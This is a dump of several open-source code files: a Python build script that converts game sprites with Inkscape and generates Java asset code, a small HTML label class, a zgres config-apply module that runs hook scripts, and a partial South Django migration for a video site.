# this will be the intermediate directory for serving as the input for the texture packer
OUTPUT_DIRECTORY=os.path.join("..","images-packer-input")
# the generated source-file to load and access the images
OUTPUT_FILE=os.path.join("..","..","core","src","com","mcminos","game","Entities.java")
IMAGE_FORMAT="RGBA"
CONFIG_FILE="CONFIG"
README_FILE="README"
# options, which will be evaluated from CONFIG and their defaults
config_options={
"symbol":'\0', # the symbol representing the entity
"size":(1,1), # the multiplier for the size (castle:2, explosion: 3)
"speed":100, # the animation speed or animation speed list (10 frames per second default)
"order":[0], # the order of the images
"zindex":700, # show this on which level?
"focus":(1,1), # anchor point of the icon
"moving":False, # This object moves by itself (like mcminos or the ghosts)
}
# w equals h, so only one value here, to speed up gaming, resolutions must be powers of 2
SIZE_LIST = [128,64,32,16]
# 8 and 4 are generated from mini
#SIZE_LIST = [128,64,16] # for testing
SIZE_LIST_MINI = [8,4]
#try:
# os.rmdir(OUTPUT_DIRECTORY)
#except OSError:
# pass # ignore missing directory
#os.mkdir(OUTPUT_DIRECTORY)
filename_format = re.compile("(?P<config>"+CONFIG_FILE+")|" + # can be config
"(?P<readme>"+README_FILE+")|" + # or readme
"(?P<minidesc>.*)" + # some descriptive stuff, which will be moved to the naming part
"(?P<mini>mini\.svg)|" + # or mini image
"(?:" + # or
"(?P<description>.*)" + # some descriptive stuff, which will be moved to the naming part
"(?P<animation_number>\d\d)" + # animation number
"(?:\.(?P<svg>svg)|-(?P<width>\d\d)x(?P<height>\d\d)\.png)" + # extension
")$")
# "(?P<name>[a-zA-Z]" + # Start with a letter
# "[a-zA-Z0-9_\-]*)" + # Continue with several alpha numerics or - or _
# "(?:-x(?P<scaling>\d\d))?" + # Have maybe scaling
invalid_name_chars = re.compile("[\-\.]")
config_dictionary={}
config_dictionary[""]=config_options
entity_list={} # The dictionary storing entities
images_count = 0 # total number of images
class Animation_Image():
'''One image of an animation.'''
def __init__(self, image, animation_step):
self.image = image
self.animation_step = animation_step
def get(self):
return (self.image, self.animation_step)
class Graphics_Element():
def __init__(self, name, config):
"""
config must have the form of the config_options
"""
self.image_dictionary = {} # this dictionary includes dictionaries with sizes per category
self.name = name
self.config = config.copy()
print "Creating new entity", name, " with config", config
def add_image(self,
png_file_name,
block_resolution,
multiple_w,multiple_h,
animation_step = 0):
if not block_resolution in self.image_dictionary:
self.image_dictionary[block_resolution] = {} # This will store the images of the animations under their corresponding step-number
self.image_dictionary[block_resolution][animation_step] = \
Animation_Image(png_file_name, animation_step)
print "Adding to graphic:",self.name,\
"storage resolution:",block_resolution,\
"real size:",(multiple_w*block_resolution,multiple_h*block_resolution),\
"step:",animation_step
# def check_size(self, width, category="default"):
# if category in self.image_dictionary:
# return width in self.image_dictionary[category]
def code(self,preload):
'''
get some code for the current graphics element.
if preload == 1 then just generate code for asset-manager
'''
global images_count
first_size = self.image_dictionary.keys()[0]
if preload == 0:
anisteps = self.image_dictionary[first_size].keys()
if self.config["order"] == None:
self.config["order"] = anisteps
if not self.config["speed"] is list:
self.config["speed"] = [self.config["speed"]] \
* len(self.config["order"])
current = "" + self.name
if preload == 0:
code = "%s = new Graphics(\'%s\',%s,%s,%s,%s,%s,%s);\n" % \
( current, self.config["symbol"],
self.config["focus"][0]-1, self.config["focus"][1]-1,
self.config["zindex"], repr(self.config["moving"]).lower(),
self.config["size"][0], self.config["size"][1])
else: code = ""
for size in self.image_dictionary:
anisteps = self.image_dictionary[size].keys()
anisteps.sort()
step_nr = 0 # allways start with 0
for anistep in anisteps:
(img, _) = self.image_dictionary[size][anistep].get()
image_name = "%s_%s" \
% (self.name,anistep)
#file_name = os.path.join( OUTPUT_DIRECTORY, image_name + ".png" )
#loc_name = os.path.join("entities", image_name + ".png")
loc_name = os.path.join(image_name)
if preload == 0:
code += "%s.addImage( atlas, \"%s\", %s, %s );\n" % ( current, \
loc_name, \
size, step_nr)
images_count += 1
else:
code += "manager.load( \"%s\", Texture.class );\n" % loc_name
step_nr += 1
if preload == 0:
for size in self.image_dictionary:
step_nr = 0 # allways start with 0
anisteps = self.image_dictionary[size].keys()
assert len(self.config['speed']) == len(self.config['order']), \
"number of animation times does not match config."
anisteps.sort()
print self.config['speed'], self.config['order'], anisteps
if len(self.config['order']) <= 1:
self.config['order'] = anisteps[:]
if len(self.config['speed']) == 1:
self.config['speed'] = self.config['speed'] * len(anisteps)
print self.config['speed'], self.config['order'], anisteps
step_nr = 0
for anistep in self.config['order']:
image_nr = anisteps.index( self.config["order"][step_nr] )
code += "%s.addAnimationStep( %s, %s );\n" % \
(current, image_nr, \
self.config['speed'][step_nr])
step_nr += 1
break # only do for one size (should be the same for all sizes)
return code
def cleanup_description(desc):
if desc == "": return ""
# cut non-numerical letters from left and right
while(not desc[0].isalpha()):
desc= desc[1:]
while(not desc[-1].isalpha()):
desc= desc[:-1]
# transform all weird letters in between
desc=re.sub(invalid_name_chars, "_", desc) # replace . and - with _
return desc
def generate_name(name, description):
if name == "":
name = description
else:
if description != "":
name = name + "_" + description
return name
process_list = []
def mkdir(dir):
subprocess.call(["mkdir","-p",dir])
def convert(input_file,output_file, resx, resy):
global process_list
# only change if not exists or source is newer
# absolut path is required for inkscape on MacOSX
output_path = os.path.abspath(output_file)
input_path = os.path.abspath(input_file)
if not os.path.isfile(output_path) or os.path.getmtime(input_path) > os.path.getmtime(output_path):
if len(process_list) == 8:
# wait until all are done
for p in process_list:
p.wait()
process_list=[]
p = subprocess.Popen(["inkscape",
"-w", "%d"%(int(resx)),
"-h", "%d"%(int(resy)),
"-e", output_path, input_path],
stdout=subprocess.PIPE)
process_list.append(p)
def convert_images(sizes, name, animation_number, root, file):
# check if entity exists
if not name in entity_list:
entity_list[name] = Graphics_Element(name,config)
current_entity = entity_list[name]
scaling=config["size"]
multiple_w=scaling[0]
multiple_h=scaling[1]
assert multiple_w>0 and multiple_h>0, "Wrong scaling."
for resolution in sizes:
# make sure destination directory exists
distutils.dir_util.mkpath( os.path.join( OUTPUT_DIRECTORY, str(resolution) ) )
packfile = os.path.join( OUTPUT_DIRECTORY, str(resolution), "pack.json" )
if not os.path.isfile(packfile): # create if necessary
# res = max(1024,int(resolution)*16)
res = 1024 # fix to see, if this accelerates
pf=open(packfile,"w")
pf.write("{\nuseIndexes: false,\nmaxWidth: %s,\nmaxHeight: %s\n}"%(res,res))
pf.close()
# convert file with inkscape
#print "width",width,"mutiples",multiple_w,multiple_h,"total",int(width)*multiple_w,int(width)*multiple_h
image_name = "%s_%s" \
% (name,animation_number)
output_file = os.path.join( OUTPUT_DIRECTORY, str(resolution), image_name + ".png" ) # check if destination already exists and skip
input_file = os.path.join(root,file)
convert(input_file, output_file,int(resolution)*multiple_w,int(resolution)*multiple_h )
current_entity.add_image(output_file,
int(resolution),
multiple_w,multiple_h,
animation_step = animation_number)
# main program -- walk input directory
for root, dirs, files in os.walk(IMAGE_DIRECTORY,topdown=True):
short_root = root[len(IMAGE_DIRECTORY)+1:] # cut off root
if len(short_root) > 0 and not short_root.startswith("flavors"): # not main directory - any sub-directory, only folders in main-directory are read, skip flavors directory
# construct the name
short_root_elements = short_root.split(os.path.sep)
root_class_name = "_".join(short_root_elements)
complete_name = re.sub(invalid_name_chars,"_",root_class_name) # replace . and - with
# find parent
parent_path = "_".join(short_root_elements[:-1])
parent_name = re.sub(invalid_name_chars, "_", parent_path) # replace . and - with _
# as top-down, needs to exist
#config_dictionary[complete_name] = config_dictionary[parent_name].copy()
new_config = config_dictionary[parent_name].copy()
print "Taking initial configuration from parent_path", parent_path, "Config:", new_config
# We are in a new directory -> Parse CONFIG, if available
if CONFIG_FILE in files:
# make config active in current scope
for option in new_config:
exec( "%s=%s" % (option, repr(new_config[option]) ))
# we execute any python code here, nothing for the enduser (TODO: maybe check format here)
exec(open(os.path.join(root,CONFIG_FILE)).read())
#new_config = {}
# write back to dictionary
for option in new_config:
new_config[option]=eval(option)
config_dictionary[complete_name]=new_config
print "Parsed configuration in ", root, "for ",complete_name,":", new_config
config_dictionary[complete_name] = new_config
config = config_dictionary[complete_name]
# check scaling parameter
if not isinstance(config["size"],tuple): # probably two coordinates
scaling=config["size"]
config["size"]=(scaling,scaling)
for file in files:
name = complete_name # init base-name
print "Working on: path:", short_root, "File name:", file
m = filename_format.match(file) # analyze filename
if m==None:
print "wrong filename format"
elif m.group("config") != None \
or m.group("readme") != None: # ignore config, readme
print "ignored or parsed before"
print
elif m.group("mini") != None: # This is the mini file
description = cleanup_description(m.group("minidesc"))
name = generate_name(name, description)
print "Found mini-file for", name ,"for configuration", config
# convert_images(SIZE_LIST_MINI,name,animation_number,root,file)
convert_images(SIZE_LIST_MINI,name,0,root,file)
else: # seems to be a regular image
description=m.group("description")
animation_number=int(m.group("animation_number"))
svg = m.group("svg") != None
width=None
height=None
if not svg:
width = int(m.group("width"))
height = int(m.group("height"))
# if there is a description add it to the name
if description != "":
description = cleanup_description( description )
name = generate_name( name, description )
# print report
print \
"""name: %(name)s
animation-nr: %(animation_number)s
is-svg: %(svg)s
width: %(width)s
height: %(height)s
config: %(config)s
"""%locals()
# if there is a name, convert images
if name != "":
if svg: # if this is an svg, create all missing sizes
convert_images(SIZE_LIST,name,animation_number,root,file)
else: # This is already a pixel-graphics (no svg)
pass # TODO: overwrite or add this
####### all parsed, now print code
print "Writing output file %s." % OUTPUT_FILE
f=open(OUTPUT_FILE,"w")
f.write( \
"""package com.mcminos.game;
/* Attention: this file is auto-generated by convert_images,
* do not change. */
import com.badlogic.gdx.ApplicationAdapter;
import com.badlogic.gdx.Gdx;
import com.badlogic.gdx.graphics.GL20;
import com.badlogic.gdx.graphics.Texture;
import com.badlogic.gdx.graphics.g2d.SpriteBatch;
import com.badlogic.gdx.assets.AssetManager;
import com.badlogic.gdx.graphics.g2d.TextureAtlas;
/* class is a singleton */
class Entities {
private static Entities ourInstance = new Entities();
public static Entities getInstance() {
return ourInstance;
}
""" )
for e in entity_list:
f.write( "public static Graphics %s;\n"%e )
resList = SIZE_LIST[:]
resList.sort(reverse=True)
f.write("\n public final static int[] resolutionList={%s};\n" \
% (",".join(map(str,resList))) )
f.write( \
"""
public static void scheduleLoad(AssetManager manager) {
""" )
#for e in entity_list:
# print "Working on", e
# f.write( entity_list[e].code(1) )
f.write("manager.load(\"entities/pack.atlas\",TextureAtlas.class);")
f.write( \
"""
} // end scheduleLoad
""" )
f.write( \
"""
public static void finishLoad(TextureAtlas atlas) {
""" )
for e in entity_list:
print "Working on", e
f.write( entity_list[e].code(0) )
f.write( "%s.finishInit();\n"%e )
f.write( \
"""
} // end finishLoad
""" )
f.write( \
"""
public static int numberImages = %d;
} // end Entities class
""" % images_count)
f.close()
# create icon-images for ios and android
print
print "============= Now creating resource icons ============"
for flavor in ["alive","forge","teaser"]:
image_dir = os.path.join(IMAGE_DIRECTORY,"flavors",flavor)
output_dir = os.path.join(IMAGE_DIRECTORY,"..","flavors",flavor)
print "Processing from " + image_dir + " to " + output_dir
icon = os.path.join(image_dir,"loadscreen.svg")
output_file = os.path.join(output_dir, "loadscreen.png")
print output_file
convert(icon,output_file,1600,1600)
icon = os.path.join(image_dir,"icon.svg")
icon_output_path = os.path.join(output_dir, "res")
for (path,res) in [("hdpi",72), ("mdpi",48), ("xhdpi",96), ("xxhdpi",144), ]:
op = os.path.join(icon_output_path, "drawable-" + path)
mkdir(op)
output_file = os.path.join( op, "ic_launcher.png")
convert(icon,output_file,res,res)
icon_output_path = os.path.join(output_dir, "data")
mkdir(icon_output_path)
for (path,res) in [("",57), ("-72",72), ("-76",76), ("@2x",114), ("-120",120), ("-72@2x",144), ("-152",152), ]:
output_file = os.path.join(icon_output_path, "Icon" + path + ".png")
convert(icon,output_file,res,res)
icon = os.path.join(image_dir,"logo-3-4.svg")
for (path,resx,resy) in [("",320,480), ("@2x",640,960) ]:
output_file = os.path.join(icon_output_path, "Default" + path + ".png")
convert(icon,output_file,resx,resy)
icon = os.path.join(image_dir,"logo-9-16.svg")
for (path,resx,resy) in [("-375w-667h",375,667), ("-375w-667h@2x",375*2,667*2), ("-414w-736h",414,736), ("-414w-736h@3x",414*3,736*3), ("-568h@2x",640,1136) ]:
output_file = os.path.join(icon_output_path, "Default" + path + ".png")
convert(icon,output_file,resx,resy)
icon = os.path.join(image_dir,"logo-10-13.svg")
for (path,resx,resy) in [("@2x~ipad",1536,2008), ("~ipad",768,1004), ]:
output_file = os.path.join(icon_output_path, "Default" + path + ".png")
convert(icon,output_file,resx,resy)
# finish inkscape processes first
for p in process_list:
p.wait()
# now call the packer
print
print "============= Now packing textures ============"
os.chdir("..")
os.chdir("..")
os.system("./gradlew texturePacker --stacktrace")
|
ulno/mcminos
|
extra/converters/convert_images.py
|
Python
|
gpl-3.0
| 18,629
|
from .HtmlElementModule import HtmlElement
from .TextElementModule import TextElement
class Label(HtmlElement):
def __init__(self, value, **attributes):
HtmlElement.__init__(self, 'label', **attributes)
self.append(TextElement(value))
|
megamandos/spiderbox
|
html/LabelModule.py
|
Python
|
mit
| 256
|
#!/usr/bin/python3
"""Apply a configuration file to a node
For example, we have the configuration of the databases in Zookeeper. We write
that config out to a JSON file:
/var/lib/zgres/config/databases.json
But, then we need to use that config to reconfigure various services, so we
write the code to reconfigure them to executable hook files in:
/var/lib/zgres/hooks/
To actually apply the config by running the hooks, we run:
zk-apply
This will run the hooks in /var/lib/zgres/hooks/ in order passing as the first
argument the directory containing the config file. If a hook fails, it is
logged, but the next hooks are run anyway.
NOTE: It is VERY important that hooks be idempotent! they WILL be called multiple times
with the same configuration.
"""
import os
import json
import sys
from logging import getLogger
import argparse
from subprocess import call, check_call
from collections import abc
import asyncio
from .plugin import subscribe
import zgres.config
_logger = getLogger('zgres')
#
# Hook Tools
#
_DEFAULT_PREFIX = '/var/lib/zgres/'
class Config(abc.Mapping):
"""A proxy object for the config directory which deserializes the config"""
def __init__(self, config_dir=None):
if config_dir is None:
config_dir = _DEFAULT_PREFIX
self._config_dir = config_dir
self._cache = {}
def __getitem__(self, name):
file = os.path.join(self._config_dir, name)
if not os.path.exists(file):
raise KeyError(name)
cached = self._cache.get(name, self)
if cached is not self:
return cached
with open(file, 'r') as f:
data = f.read()
_, ext = os.path.splitext(file)
if ext == '.json':
data = json.loads(data)
else:
raise NotImplementedError("Don't know how to deserialize {} files".format(ext))
self._cache[name] = data
return data
def __iter__(self):
for k in os.listdir(self._config_dir):
yield k
def __len__(self):
return len(os.listdir(self._config_dir))
def render_template(template, destination, **data):
with open(template, 'r') as f:
template = f.read()
result = template.format(**data)
return writeout(result, destination)
def writeout(data, destination):
if os.path.exists(destination):
with open(destination, 'r') as f:
existing = f.read()
if existing == data:
return False
head, tail = os.path.split(destination)
tmpfile = os.path.join(head, '.' + tail + '.zgres_tmp')
with open(tmpfile, 'w') as f:
f.write(data)
os.rename(tmpfile, destination)
return True
#
# Apply
#
def _run_hooks(hooks, cfg_dir):
failures = 0
for filename in sorted(os.listdir(hooks)):
if filename.startswith('.'):
continue
hook = os.path.join(hooks, filename)
if not os.access(hook, os.X_OK):
_logger.warn('Not running non-executable hook: {}'.format(hook))
continue
returncode = _run_one_hook(hook, cfg_dir)
if returncode != 0:
_logger.error('Failure when running hook: {}'.format(hook))
failures += 1
return failures
def _run_one_hook(hook, path):
# private function so tests can patch it
return call([hook, path])
def _apply(_prefix=_DEFAULT_PREFIX):
cfg_dir = os.path.join(_prefix, 'config')
hooks = os.path.join(_prefix, 'hooks')
failures = _run_hooks(hooks, cfg_dir)
return failures
class Plugin:
_write_timer = None
def __init__(self, name, app):
self._state = {
'databases': [],
'masters': {},
'conn_info': {}
}
@subscribe
def databases(self, databases):
_logger.info('New database list {}'.format(databases))
self._state['databases'] = databases
self._write()
@subscribe
def masters(self, masters):
_logger.info('New masters list {}'.format(masters))
self._state['masters'] = masters
self._write()
@subscribe
def conn_info(self, conn_info):
_logger.info('New conn_info list {}'.format(conn_info))
self._state['conn_info'] = conn_info
self._write()
def _write(self):
if self._write_timer is None:
loop = asyncio.get_event_loop()
# limit the writes to our list of databases to 1 per second
self._write_timer = loop.call_later(1, self._debounced_write)
def _debounced_write(self):
self._write_timer = None
with open('/var/lib/zgres/config/databases.json.tmp', 'w') as f:
f.write(json.dumps(self._state, sort_keys=True))
os.rename('/var/lib/zgres/config/databases.json.tmp', '/var/lib/zgres/config/databases.json')
_logger.info('Written databases.json, calling zgres-apply')
check_call('zgres-apply') # apply the configuration to the machine
#
# Command Line Scripts
#
def apply_cli(argv=sys.argv):
parser = argparse.ArgumentParser(description='Apply all loaded, but outstanding configs')
zgres.config.parse_args(parser, argv)
sys.exit(_apply())
|
jinty/zgres
|
zgres/apply.py
|
Python
|
mit
| 5,218
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'FeedImport.total_videos'
db.alter_column('localtv_feedimport', 'total_videos', self.gf('django.db.models.fields.PositiveIntegerField')(null=True))
# Changing field 'SearchImport.total_videos'
db.alter_column('localtv_searchimport', 'total_videos', self.gf('django.db.models.fields.PositiveIntegerField')(null=True))
def backwards(self, orm):
# Changing field 'FeedImport.total_videos'
db.alter_column('localtv_feedimport', 'total_videos', self.gf('django.db.models.fields.PositiveIntegerField')())
# Changing field 'SearchImport.total_videos'
db.alter_column('localtv_searchimport', 'total_videos', self.gf('django.db.models.fields.PositiveIntegerField')())
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'localtv.category': {
'Meta': {'ordering': "['name']", 'unique_together': "(('slug', 'site'), ('name', 'site'))", 'object_name': 'Category'},
'contest_mode': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'child_set'", 'null': 'True', 'to': "orm['localtv.Category']"}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'})
},
'localtv.feed': {
'Meta': {'unique_together': "(('feed_url', 'site'),)", 'object_name': 'Feed'},
'auto_approve': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'auto_authors': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'auto_feed_set'", 'blank': 'True', 'to': "orm['auth.User']"}),
'auto_categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['localtv.Category']", 'symmetrical': 'False', 'blank': 'True'}),
'avoid_frontpage': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'calculated_source_type': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'etag': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'}),
'feed_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'has_thumbnail': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'thumbnail_extension': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'webpage': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'when_submitted': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
'localtv.feedimport': {
'Meta': {'ordering': "['-start']", 'object_name': 'FeedImport'},
'auto_approve': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'feed': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['localtv.Feed']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'start': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'total_videos': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'videos_imported': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'videos_skipped': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'localtv.feedimportindex': {
'Meta': {'object_name': 'FeedImportIndex'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'source_import': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['localtv.FeedImport']"}),
'video': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['localtv.Video']", 'unique': 'True'})
},
'localtv.newslettersettings': {
'Meta': {'object_name': 'NewsletterSettings'},
'facebook_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'intro': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'last_sent': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'repeat': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'show_icon': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'sitelocation': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['localtv.SiteLocation']", 'unique': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'twitter_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'video1': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'newsletter1'", 'null': 'True', 'to': "orm['localtv.Video']"}),
'video2': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'newsletter2'", 'null': 'True', 'to': "orm['localtv.Video']"}),
'video3': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'newsletter3'", 'null': 'True', 'to': "orm['localtv.Video']"}),
'video4': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'newsletter4'", 'null': 'True', 'to': "orm['localtv.Video']"}),
'video5': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'newsletter5'", 'null': 'True', 'to': "orm['localtv.Video']"})
},
'localtv.originalvideo': {
'Meta': {'object_name': 'OriginalVideo'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'remote_thumbnail_hash': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '64'}),
'remote_video_was_deleted': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'thumbnail_updated': ('django.db.models.fields.DateTimeField', [], {'blank': 'True'}),
'thumbnail_url': ('django.db.models.fields.URLField', [], {'max_length': '400', 'blank': 'True'}),
'video': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'original'", 'unique': 'True', 'to': "orm['localtv.Video']"})
},
'localtv.savedsearch': {
'Meta': {'object_name': 'SavedSearch'},
'auto_approve': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'auto_authors': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'auto_savedsearch_set'", 'blank': 'True', 'to': "orm['auth.User']"}),
'auto_categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['localtv.Category']", 'symmetrical': 'False', 'blank': 'True'}),
'has_thumbnail': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'query_string': ('django.db.models.fields.TextField', [], {}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'thumbnail_extension': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'when_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
'localtv.searchimport': {
'Meta': {'ordering': "['-start']", 'object_name': 'SearchImport'},
'auto_approve': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'search': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['localtv.SavedSearch']"}),
'start': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'total_videos': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'videos_imported': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'videos_skipped': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'localtv.searchimportindex': {
'Meta': {'object_name': 'SearchImportIndex'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'source_import': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['localtv.SearchImport']"}),
'suite': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'video': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['localtv.Video']", 'unique': 'True'})
},
'localtv.sitelocation': {
'Meta': {'object_name': 'SiteLocation'},
'about_html': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'admins': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'admin_for'", 'blank': 'True', 'to': "orm['auth.User']"}),
'background': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'comments_required_login': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'css': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'display_submit_button': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'footer_html': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'has_thumbnail': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'hide_get_started': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'playlists_enabled': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'screen_all_comments': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'sidebar_html': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']", 'unique': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'submission_requires_login': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'tagline': ('django.db.models.fields.CharField', [], {'max_length': '4096', 'blank': 'True'}),
'thumbnail_extension': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
